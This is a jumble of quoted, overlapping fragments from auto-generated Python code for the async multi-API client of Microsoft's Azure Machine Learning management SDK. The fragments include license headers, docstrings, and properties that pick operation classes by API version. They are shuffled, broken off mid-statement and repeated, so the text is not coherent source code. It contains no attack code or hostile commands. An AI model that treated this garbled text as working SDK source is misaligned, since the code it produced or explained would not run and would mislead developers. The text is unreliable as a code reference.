License. See License.txt in the project root for #", "the operation group is not described in the profile. :param credential: Credential needed", "for # license information. # # Code generated by Microsoft (R) AutoRest Code", "from ..v2021_10_01_dataplanepreview.aio.operations import ComponentVersionsOperations as OperationClass elif api_version == '2022-02-01-preview': from ..v2022_02_01_preview.aio.operations import", "else: raise ValueError(\"API version {} does not have operation group 'model_containers'\".format(api_version)) return OperationClass(self._client,", "OperationClass elif api_version == '2022-01-01-preview': from ..v2022_01_01_preview.aio.operations import WorkspaceConnectionsOperations as OperationClass elif api_version", "parameter sets the default API version if the operation group is not described", "== '2021-10-01': from ..v2021_10_01.aio.operations import DatastoresOperations as OperationClass elif api_version == '2022-02-01-preview': from", "OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) async def close(self): await self._client.close() async def __aenter__(self): await", "import ComputeOperations as OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations import ComputeOperations as", "2022-01-01-preview: :class:`WorkspaceFeaturesOperations<azure.mgmt.machinelearningservices.v2022_01_01_preview.aio.operations.WorkspaceFeaturesOperations>` * 2022-05-01: :class:`WorkspaceFeaturesOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.WorkspaceFeaturesOperations>` \"\"\" api_version = self._get_api_version('workspace_features') if api_version == '2021-10-01':", ":class:`UsagesOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.UsagesOperations>` \"\"\" api_version = self._get_api_version('usages') if api_version == '2021-10-01': from ..v2021_10_01.aio.operations import UsagesOperations", 
"2022-05-01: :class:`BatchDeploymentsOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.BatchDeploymentsOperations>` \"\"\" api_version = self._get_api_version('batch_deployments') if api_version == '2021-10-01': from ..v2021_10_01.aio.operations import", "\"\"\"Instance depends on the API version: * 2021-10-01: :class:`OnlineDeploymentsOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.OnlineDeploymentsOperations>` * 2022-02-01-preview: :class:`OnlineDeploymentsOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.OnlineDeploymentsOperations>` *", "\"\"\"Instance depends on the API version: * 2021-10-01: :class:`WorkspaceConnectionsOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.WorkspaceConnectionsOperations>` * 2022-01-01-preview: :class:`WorkspaceConnectionsOperations<azure.mgmt.machinelearningservices.v2022_01_01_preview.aio.operations.WorkspaceConnectionsOperations>` *", "not have operation group 'events'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def experiments(self):", "def data_containers(self): \"\"\"Instance depends on the API version: * 2022-02-01-preview: :class:`DataContainersOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.DataContainersOperations>` * 2022-05-01:", "..v2022_02_01_preview.aio.operations import OnlineEndpointsOperations as OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations import OnlineEndpointsOperations", "operation group 'temporary_data_references'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def usages(self): \"\"\"Instance depends", "elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations import 
WorkspacesOperations as OperationClass else: raise ValueError(\"API", "import JobsOperations as OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations import JobsOperations as", "* v1.0: :class:`ExperimentsOperations<azure.mgmt.machinelearningservices.runhistory.aio.operations.ExperimentsOperations>` \"\"\" api_version = self._get_api_version('experiments') if api_version == 'v1.0': from ..runhistory.aio.operations", "from ..v2020_09_01_dataplanepreview.aio.operations import BatchJobEndpointOperations as OperationClass else: raise ValueError(\"API version {} does not", "'models'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def online_deployments(self): \"\"\"Instance depends on the", "def __init__( self, credential: \"AsyncTokenCredential\", subscription_id: str, api_version: Optional[str] = None, base_url: str", "not have operation group 'environment_versions'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def events(self):", "elif api_version == '2022-01-01-preview': from ..v2022_01_01_preview.aio.operations import QuotasOperations as OperationClass elif api_version ==", "Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def operations(self): \"\"\"Instance depends on the API version: * 2021-10-01:", "..model_dataplane.aio.operations import ModelsOperations as OperationClass else: raise ValueError(\"API version {} does not have", "self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def run_artifacts(self): \"\"\"Instance depends on the API version: *", "API version: * 2021-10-01: 
:class:`WorkspaceFeaturesOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.WorkspaceFeaturesOperations>` * 2022-01-01-preview: :class:`WorkspaceFeaturesOperations<azure.mgmt.machinelearningservices.v2022_01_01_preview.aio.operations.WorkspaceFeaturesOperations>` * 2022-05-01: :class:`WorkspaceFeaturesOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.WorkspaceFeaturesOperations>` \"\"\" api_version", "the MIT License. See License.txt in the project root for # license information.", "'2022-05-01': from ..v2022_05_01.aio.operations import ComponentVersionsOperations as OperationClass else: raise ValueError(\"API version {} does", "2021-10-01: :class:`DatasetContainersOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.DatasetContainersOperations>` \"\"\" api_version = self._get_api_version('dataset_containers') if api_version == '2021-10-01': from ..v2021_10_01.aio.operations import", "api_version = self._get_api_version('model_versions') if api_version == '2021-10-01': from ..v2021_10_01.aio.operations import ModelVersionsOperations as OperationClass", "azure-core based client \"\"\" pass class AzureMachineLearningWorkspaces(MultiApiClientMixin, _SDKClient): \"\"\"These APIs allow end users", ":class:`ComponentVersionsOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.ComponentVersionsOperations>` * 2022-05-01: :class:`ComponentVersionsOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.ComponentVersionsOperations>` \"\"\" api_version = self._get_api_version('component_versions') if api_version == '2021-10-01': from", "MIT License. See License.txt in the project root for # license information. 
#", "* 2022-01-01-preview: :class:`PrivateLinkResourcesOperations<azure.mgmt.machinelearningservices.v2022_01_01_preview.aio.operations.PrivateLinkResourcesOperations>` * 2022-05-01: :class:`PrivateLinkResourcesOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.PrivateLinkResourcesOperations>` \"\"\" api_version = self._get_api_version('private_link_resources') if api_version ==", "'2022-02-01-preview': from ..v2022_02_01_preview.aio.operations import EnvironmentContainersOperations as OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations", "from ..runhistory.aio.operations import EventsOperations as OperationClass else: raise ValueError(\"API version {} does not", "'2021-10-01': from ..v2021_10_01.aio.operations import ModelContainersOperations as OperationClass elif api_version == '2021-10-01-dataplanepreview': from ..v2021_10_01_dataplanepreview.aio.operations", "@property def batch_deployments(self): \"\"\"Instance depends on the API version: * 2021-10-01: :class:`BatchDeploymentsOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.BatchDeploymentsOperations>` *", "api_version == '2021-10-01-dataplanepreview': from ..v2021_10_01_dataplanepreview.aio.operations import ModelContainersOperations as OperationClass elif api_version == '2022-02-01-preview':", "2021-10-01: :class:`PrivateEndpointConnectionsOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.PrivateEndpointConnectionsOperations>` * 2022-01-01-preview: :class:`PrivateEndpointConnectionsOperations<azure.mgmt.machinelearningservices.v2022_01_01_preview.aio.operations.PrivateEndpointConnectionsOperations>` * 2022-05-01: :class:`PrivateEndpointConnectionsOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.PrivateEndpointConnectionsOperations>` \"\"\" api_version = self._get_api_version('private_endpoint_connections') if", "Deserializer(self._models_dict(api_version))) @property def run(self): 
\"\"\"Instance depends on the API version: * v1.0: :class:`RunOperations<azure.mgmt.machinelearningservices.runhistory.aio.operations.RunOperations>`", "if api_version == '2021-10-01': from ..v2021_10_01.aio.operations import PrivateEndpointConnectionsOperations as OperationClass elif api_version ==", "api_version = self._get_api_version('assets') if api_version == '1.0.0': from ..model_dataplane.aio.operations import AssetsOperations as OperationClass", "self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def batch_deployments(self): \"\"\"Instance depends on the API version: *", ":type credential: ~azure.core.credentials_async.AsyncTokenCredential :param subscription_id: The ID of the target subscription. :type subscription_id:", "OperationClass elif api_version == '2022-02-01-preview': from ..v2022_02_01_preview.aio.operations import JobsOperations as OperationClass elif api_version", "if api_version == '2021-10-01': from ..v2021_10_01.aio.operations import EnvironmentVersionsOperations as OperationClass elif api_version ==", "private_endpoint_connections(self): \"\"\"Instance depends on the API version: * 2021-10-01: :class:`PrivateEndpointConnectionsOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.PrivateEndpointConnectionsOperations>` * 2022-01-01-preview: :class:`PrivateEndpointConnectionsOperations<azure.mgmt.machinelearningservices.v2022_01_01_preview.aio.operations.PrivateEndpointConnectionsOperations>`", "in final version of multiapi azure-core based client \"\"\" pass class AzureMachineLearningWorkspaces(MultiApiClientMixin, _SDKClient):", "import Any, Optional, TYPE_CHECKING from azure.mgmt.core import AsyncARMPipelineClient from azure.profiles import KnownProfiles, ProfileDefinition", "elif api_version == '2022-02-01-preview': from ..v2022_02_01_preview import models return models elif api_version ==", "OperationClass elif api_version == '2022-05-01': from 
..v2022_05_01.aio.operations import ModelVersionsOperations as OperationClass else: raise", "api_version == '1.5.0': from ..dataset_dataplane.aio.operations import DeleteOperations as OperationClass elif api_version == 'v1.0':", "from ..v2021_10_01.aio.operations import PrivateEndpointConnectionsOperations as OperationClass elif api_version == '2022-01-01-preview': from ..v2022_01_01_preview.aio.operations import", "'2020-09-01-dataplanepreview', 'data_call': '1.5.0', 'data_container': '1.5.0', 'data_version': '1.5.0', 'dataset_containers': '2021-10-01', 'dataset_controller_v2': '1.5.0', 'dataset_v2': '1.5.0',", "api_version == '2022-01-01-preview': from ..v2022_01_01_preview.aio.operations import WorkspaceConnectionsOperations as OperationClass elif api_version == '2022-05-01':", "ValueError(\"API version {} does not have operation group 'workspace_features'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)),", "on the API version: * 2021-10-01: :class:`BatchDeploymentsOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.BatchDeploymentsOperations>` * 2022-02-01-preview: :class:`BatchDeploymentsOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.BatchDeploymentsOperations>` * 2022-05-01: :class:`BatchDeploymentsOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.BatchDeploymentsOperations>`", "import UsagesOperations as OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations import UsagesOperations as", "for k, v in cls.models(api_version).__dict__.items() if isinstance(v, type)} @classmethod def models(cls, api_version=DEFAULT_API_VERSION): \"\"\"Module", "from KnownProfiles to dict. :type profile: azure.profiles.KnownProfiles :keyword int polling_interval: Default waiting time", "Azure. For production, you should stick to a particular api-version and/or profile. 
The", "operation group 'run'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def run_artifacts(self): \"\"\"Instance depends", "api_version = self._get_api_version('run_artifacts') if api_version == 'v1.0': from ..runhistory.aio.operations import RunArtifactsOperations as OperationClass", "from ..v2022_01_01_preview.aio.operations import WorkspaceConnectionsOperations as OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations import", "api_version == '2021-10-01': from ..v2021_10_01.aio.operations import EnvironmentVersionsOperations as OperationClass elif api_version == '2021-10-01-dataplanepreview':", "QuotasOperations as OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations import QuotasOperations as OperationClass", "== '2021-10-01': from ..v2021_10_01.aio.operations import CodeContainersOperations as OperationClass elif api_version == '2021-10-01-dataplanepreview': from", "Deserializer(self._models_dict(api_version))) @property def spans(self): \"\"\"Instance depends on the API version: * v1.0: :class:`SpansOperations<azure.mgmt.machinelearningservices.runhistory.aio.operations.SpansOperations>`", "api_version == 'v1.0': from ..runhistory.aio.operations import DeleteOperations as OperationClass else: raise ValueError(\"API version", "\"\"\" api_version = self._get_api_version('batch_job_deployment') if api_version == '2020-09-01-dataplanepreview': from ..v2020_09_01_dataplanepreview.aio.operations import BatchJobDeploymentOperations as", "'datasets_v1'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def datastores(self): \"\"\"Instance depends on the", "@classmethod def models(cls, api_version=DEFAULT_API_VERSION): \"\"\"Module depends on the API version: * 
1.5.0: :mod:`dataset_dataplane.models<azure.mgmt.machinelearningservices.dataset_dataplane.models>`", "import OnlineDeploymentsOperations as OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations import OnlineDeploymentsOperations as", "AsyncOperationsOperations as OperationClass else: raise ValueError(\"API version {} does not have operation group", "API version: * 1.5.0: :class:`DeleteOperations<azure.mgmt.machinelearningservices.dataset_dataplane.aio.operations.DeleteOperations>` * v1.0: :class:`DeleteOperations<azure.mgmt.machinelearningservices.runhistory.aio.operations.DeleteOperations>` \"\"\" api_version = self._get_api_version('delete') if", "OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def compute(self): \"\"\"Instance depends on the API version:", "current implemetation of MultiApiClientMixin.\" Will be removed in final version of multiapi azure-core", "in the profile. 
:param credential: Credential needed for the client to connect to", "else: raise ValueError(\"API version {} does not have operation group 'compute'\".format(api_version)) return OperationClass(self._client,", "@property def experiments(self): \"\"\"Instance depends on the API version: * v1.0: :class:`ExperimentsOperations<azure.mgmt.machinelearningservices.runhistory.aio.operations.ExperimentsOperations>` \"\"\"", "else: raise ValueError(\"API version {} does not have operation group 'runs'\".format(api_version)) return OperationClass(self._client,", "\"\"\" api_version = self._get_api_version('data_version') if api_version == '1.5.0': from ..dataset_dataplane.aio.operations import DataVersionOperations as", "workspace_features(self): \"\"\"Instance depends on the API version: * 2021-10-01: :class:`WorkspaceFeaturesOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.WorkspaceFeaturesOperations>` * 2022-01-01-preview: :class:`WorkspaceFeaturesOperations<azure.mgmt.machinelearningservices.v2022_01_01_preview.aio.operations.WorkspaceFeaturesOperations>`", "* 2021-10-01: :class:`UsagesOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.UsagesOperations>` * 2022-01-01-preview: :class:`UsagesOperations<azure.mgmt.machinelearningservices.v2022_01_01_preview.aio.operations.UsagesOperations>` * 2022-05-01: :class:`UsagesOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.UsagesOperations>` \"\"\" api_version = self._get_api_version('usages')", "**kwargs) self._client = AsyncARMPipelineClient(base_url=base_url, config=self._config, **kwargs) super(AzureMachineLearningWorkspaces, self).__init__( api_version=api_version, profile=profile ) @classmethod def", "as OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations import QuotasOperations as OperationClass else:", "== '2022-02-01-preview': from ..v2022_02_01_preview.aio.operations import ModelContainersOperations as OperationClass elif 
api_version == '2022-05-01': from", "'events': 'v1.0', 'experiments': 'v1.0', 'extensive_model': '1.0.0', 'get_operation_status': '1.5.0', 'metric': 'v1.0', 'migration': '1.0.0', 'models':", "operation group 'spans'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def temporary_data_references(self): \"\"\"Instance depends", "API version: * 1.0.0: :class:`ExtensiveModelOperations<azure.mgmt.machinelearningservices.model_dataplane.aio.operations.ExtensiveModelOperations>` \"\"\" api_version = self._get_api_version('extensive_model') if api_version == '1.0.0':", "api_version == '2022-02-01-preview': from ..v2022_02_01_preview.aio.operations import OnlineDeploymentsOperations as OperationClass elif api_version == '2022-05-01':", "version {} does not have operation group 'operations'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version)))", ":class:`ComputeOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.ComputeOperations>` \"\"\" api_version = self._get_api_version('compute') if api_version == '2021-10-01': from ..v2021_10_01.aio.operations import ComputeOperations", "BatchJobDeploymentOperations as OperationClass else: raise ValueError(\"API version {} does not have operation group", "Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def quotas(self): \"\"\"Instance depends on the API version: * 2021-10-01:", "Deserializer(self._models_dict(api_version))) @property def quotas(self): \"\"\"Instance depends on the API version: * 2021-10-01: :class:`QuotasOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.QuotasOperations>`", "api_version == '1.0.0': from ..model_dataplane import models return models elif api_version == 'v1.0':", "version: * v1.0: 
:class:`ExperimentsOperations<azure.mgmt.machinelearningservices.runhistory.aio.operations.ExperimentsOperations>` \"\"\" api_version = self._get_api_version('experiments') if api_version == 'v1.0': from", "have operation group 'data_containers'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def data_version(self): \"\"\"Instance", "on the API version: * v1.0: :class:`ExperimentsOperations<azure.mgmt.machinelearningservices.runhistory.aio.operations.ExperimentsOperations>` \"\"\" api_version = self._get_api_version('experiments') if api_version", "'2022-02-01-preview': from ..v2022_02_01_preview.aio.operations import BatchDeploymentsOperations as OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations", "@property def online_deployments(self): \"\"\"Instance depends on the API version: * 2021-10-01: :class:`OnlineDeploymentsOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.OnlineDeploymentsOperations>` *", "== '2022-02-01-preview': from ..v2022_02_01_preview.aio.operations import ComponentVersionsOperations as OperationClass elif api_version == '2022-05-01': from", "as OperationClass elif api_version == '2022-02-01-preview': from ..v2022_02_01_preview.aio.operations import ModelContainersOperations as OperationClass elif", "..v2022_05_01.aio.operations import WorkspaceConnectionsOperations as OperationClass else: raise ValueError(\"API version {} does not have", "depends on the API version: * 2021-10-01: :class:`EnvironmentVersionsOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.EnvironmentVersionsOperations>` * 2021-10-01-dataplanepreview: :class:`EnvironmentVersionsOperations<azure.mgmt.machinelearningservices.v2021_10_01_dataplanepreview.aio.operations.EnvironmentVersionsOperations>` * 2022-02-01-preview:", "the API version: * v1.0: 
:class:`RunsOperations<azure.mgmt.machinelearningservices.runhistory.aio.operations.RunsOperations>` \"\"\" api_version = self._get_api_version('runs') if api_version ==", "ComponentVersionsOperations as OperationClass else: raise ValueError(\"API version {} does not have operation group", "== '2020-09-01-dataplanepreview': from ..v2020_09_01_dataplanepreview import models return models elif api_version == '2021-10-01': from", "the API version: * 2021-10-01: :class:`UsagesOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.UsagesOperations>` * 2022-01-01-preview: :class:`UsagesOperations<azure.mgmt.machinelearningservices.v2022_01_01_preview.aio.operations.UsagesOperations>` * 2022-05-01: :class:`UsagesOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.UsagesOperations>` \"\"\"", "raise ValueError(\"API version {} does not have operation group 'dataset_v2'\".format(api_version)) return OperationClass(self._client, self._config,", "not have operation group 'dataset_v2'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def dataset_versions(self):", "return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def migration(self): \"\"\"Instance depends on the API", "depends on the API version: * 2021-10-01: :class:`OnlineEndpointsOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.OnlineEndpointsOperations>` * 2022-02-01-preview: :class:`OnlineEndpointsOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.OnlineEndpointsOperations>` * 2022-05-01:", "== '2021-10-01-dataplanepreview': from ..v2021_10_01_dataplanepreview.aio.operations import ModelVersionsOperations as OperationClass elif api_version == '2022-02-01-preview': from", "api_version = 
self._get_api_version('environment_containers') if api_version == '2021-10-01': from ..v2021_10_01.aio.operations import EnvironmentContainersOperations as OperationClass", "{} does not have operation group 'data_versions'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property", "@property def dataset_containers(self): \"\"\"Instance depends on the API version: * 2021-10-01: :class:`DatasetContainersOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.DatasetContainersOperations>` \"\"\"", "type)} @classmethod def models(cls, api_version=DEFAULT_API_VERSION): \"\"\"Module depends on the API version: * 1.5.0:", "\"\"\"Instance depends on the API version: * 2021-10-01: :class:`DatasetVersionsOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.DatasetVersionsOperations>` \"\"\" api_version = self._get_api_version('dataset_versions')", "WorkspacesOperations as OperationClass elif api_version == '2022-01-01-preview': from ..v2022_01_01_preview.aio.operations import WorkspacesOperations as OperationClass", "as OperationClass elif api_version == '2021-10-01-dataplanepreview': from ..v2021_10_01_dataplanepreview.aio.operations import CodeContainersOperations as OperationClass elif", "the API version: * 2021-10-01: :class:`WorkspaceFeaturesOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.WorkspaceFeaturesOperations>` * 2022-01-01-preview: :class:`WorkspaceFeaturesOperations<azure.mgmt.machinelearningservices.v2022_01_01_preview.aio.operations.WorkspaceFeaturesOperations>` * 2022-05-01: :class:`WorkspaceFeaturesOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.WorkspaceFeaturesOperations>` \"\"\"", "..dataset_dataplane.aio.operations import DataVersionOperations as OperationClass else: raise ValueError(\"API version {} does not have", "ValueError(\"API version {} does not 
have operation group 'data_container'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)),", "TokenCredential from azure.core.credentials_async import AsyncTokenCredential class _SDKClient(object): def __init__(self, *args, **kwargs): \"\"\"This is", ":class:`ComponentContainersOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.ComponentContainersOperations>` \"\"\" api_version = self._get_api_version('component_containers') if api_version == '2021-10-01': from ..v2021_10_01.aio.operations import ComponentContainersOperations", "Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def datasets_v1(self): \"\"\"Instance depends on the API version: * 1.5.0:", "api_version == '2022-05-01': from ..v2022_05_01.aio.operations import JobsOperations as OperationClass else: raise ValueError(\"API version", "== '2022-05-01': from ..v2022_05_01.aio.operations import ModelVersionsOperations as OperationClass else: raise ValueError(\"API version {}", "OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def data_version(self): \"\"\"Instance depends on the API version:", "\"\"\" api_version = self._get_api_version('get_operation_status') if api_version == '1.5.0': from ..dataset_dataplane.aio.operations import GetOperationStatusOperations as", "group 'registry_management_non_workspace'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def run(self): \"\"\"Instance depends on", "models return models elif api_version == '2022-01-01-preview': from ..v2022_01_01_preview import models return models", "@property def assets(self): \"\"\"Instance depends on the API version: * 1.0.0: 
:class:`AssetsOperations<azure.mgmt.machinelearningservices.model_dataplane.aio.operations.AssetsOperations>` \"\"\"", "2022-05-01: :class:`EnvironmentVersionsOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.EnvironmentVersionsOperations>` \"\"\" api_version = self._get_api_version('environment_versions') if api_version == '2021-10-01': from ..v2021_10_01.aio.operations import", "None: DEFAULT_API_VERSION, 'assets': '1.0.0', 'async_operations': 'v1.0', 'batch_job_deployment': '2020-09-01-dataplanepreview', 'batch_job_endpoint': '2020-09-01-dataplanepreview', 'data_call': '1.5.0', 'data_container':", "* 2021-10-01: :class:`ComputeOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.ComputeOperations>` * 2022-01-01-preview: :class:`ComputeOperations<azure.mgmt.machinelearningservices.v2022_01_01_preview.aio.operations.ComputeOperations>` * 2022-05-01: :class:`ComputeOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.ComputeOperations>` \"\"\" api_version = self._get_api_version('compute')", "* 2022-05-01: :class:`CodeVersionsOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.CodeVersionsOperations>` \"\"\" api_version = self._get_api_version('code_versions') if api_version == '2021-10-01': from ..v2021_10_01.aio.operations", "api_version == '2021-10-01': from ..v2021_10_01.aio.operations import ModelContainersOperations as OperationClass elif api_version == '2021-10-01-dataplanepreview':", "raise ValueError(\"API version {} does not have operation group 'online_endpoints'\".format(api_version)) return OperationClass(self._client, self._config,", "..runhistory.aio.operations import SpansOperations as OperationClass else: raise ValueError(\"API version {} does not have", "@property def dataset_controller_v2(self): \"\"\"Instance depends on the API version: * 1.5.0: 
:class:`DatasetControllerV2Operations<azure.mgmt.machinelearningservices.dataset_dataplane.aio.operations.DatasetControllerV2Operations>` \"\"\"", "..v2021_10_01_dataplanepreview.aio.operations import ModelVersionsOperations as OperationClass elif api_version == '2022-02-01-preview': from ..v2022_02_01_preview.aio.operations import ModelVersionsOperations", "import DatastoresOperations as OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations import DatastoresOperations as", "OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations import PrivateEndpointConnectionsOperations as OperationClass else: raise", "2021-10-01: :class:`PrivateLinkResourcesOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.PrivateLinkResourcesOperations>` * 2022-01-01-preview: :class:`PrivateLinkResourcesOperations<azure.mgmt.machinelearningservices.v2022_01_01_preview.aio.operations.PrivateLinkResourcesOperations>` * 2022-05-01: :class:`PrivateLinkResourcesOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.PrivateLinkResourcesOperations>` \"\"\" api_version = self._get_api_version('private_link_resources') if", "version {} does not have operation group 'workspaces'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version)))", "version {} does not have operation group 'dataset_v2'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version)))", "'2021-10-01': from ..v2021_10_01.aio.operations import DatastoresOperations as OperationClass elif api_version == '2022-02-01-preview': from ..v2022_02_01_preview.aio.operations", "'private_link_resources'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), 
Deserializer(self._models_dict(api_version))) @property def quotas(self): \"\"\"Instance depends on the", "public Azure. For production, you should stick to a particular api-version and/or profile.", ":type api_version: str :param base_url: Service URL :type base_url: str :param profile: A", "does not have operation group 'batch_endpoints'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def", "'get_operation_status': '1.5.0', 'metric': 'v1.0', 'migration': '1.0.0', 'models': '1.0.0', 'registry_management_non_workspace': 'v1.0', 'run': 'v1.0', 'run_artifacts':", "self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def delete(self): \"\"\"Instance depends on the API version: *", "not have operation group 'migration'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def model_containers(self):", "import EnvironmentVersionsOperations as OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations import EnvironmentVersionsOperations as", "import models return models elif api_version == '2022-02-01-preview': from ..v2022_02_01_preview import models return", "as OperationClass else: raise ValueError(\"API version {} does not have operation group 'dataset_containers'\".format(api_version))", "..v2021_10_01.aio.operations import ComponentContainersOperations as OperationClass elif api_version == '2021-10-01-dataplanepreview': from ..v2021_10_01_dataplanepreview.aio.operations import ComponentContainersOperations", "1.5.0: :class:`DataVersionOperations<azure.mgmt.machinelearningservices.dataset_dataplane.aio.operations.DataVersionOperations>` \"\"\" api_version = self._get_api_version('data_version') if api_version == '1.5.0': from 
..dataset_dataplane.aio.operations import", "else: raise ValueError(\"API version {} does not have operation group 'data_versions'\".format(api_version)) return OperationClass(self._client,", "return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def dataset_versions(self): \"\"\"Instance depends on the API", "'2021-10-01-dataplanepreview': from ..v2021_10_01_dataplanepreview.aio.operations import EnvironmentVersionsOperations as OperationClass elif api_version == '2022-02-01-preview': from ..v2022_02_01_preview.aio.operations", "version: * 2021-10-01: :class:`ModelVersionsOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.ModelVersionsOperations>` * 2021-10-01-dataplanepreview: :class:`ModelVersionsOperations<azure.mgmt.machinelearningservices.v2021_10_01_dataplanepreview.aio.operations.ModelVersionsOperations>` * 2022-02-01-preview: :class:`ModelVersionsOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.ModelVersionsOperations>` * 2022-05-01: :class:`ModelVersionsOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.ModelVersionsOperations>`", "2021-10-01: :class:`ComponentVersionsOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.ComponentVersionsOperations>` * 2021-10-01-dataplanepreview: :class:`ComponentVersionsOperations<azure.mgmt.machinelearningservices.v2021_10_01_dataplanepreview.aio.operations.ComponentVersionsOperations>` * 2022-02-01-preview: :class:`ComponentVersionsOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.ComponentVersionsOperations>` * 2022-05-01: 